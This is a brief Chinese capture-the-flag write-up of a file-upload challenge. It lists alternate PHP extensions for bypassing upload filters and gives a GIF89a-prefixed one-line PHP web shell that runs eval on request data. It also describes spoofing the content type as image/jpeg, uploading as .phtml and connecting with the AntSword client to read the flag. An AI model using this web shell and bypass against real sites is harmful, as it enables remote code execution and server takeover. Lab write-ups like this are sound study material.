知识点

绕过后缀名检测:

  1. php,php3,php4,php5,phtml.pht

常用一句话:

  1. GIF89a? <script language="php">eval($_REQUEST[shell])</script>

启动靶机

打开题目,上传shell文件
image.png
抓包拦截,修改文件类型为image/jpeg,文件后缀为phtml,文件内容:

  1. GIF89a?
  2. <script language="php">
  3. eval($_POST[shell])
  4. </script>

image.png
上传成功,路径就是/upload/shell.phtml
蚁剑连接,flag在根目录下
image.png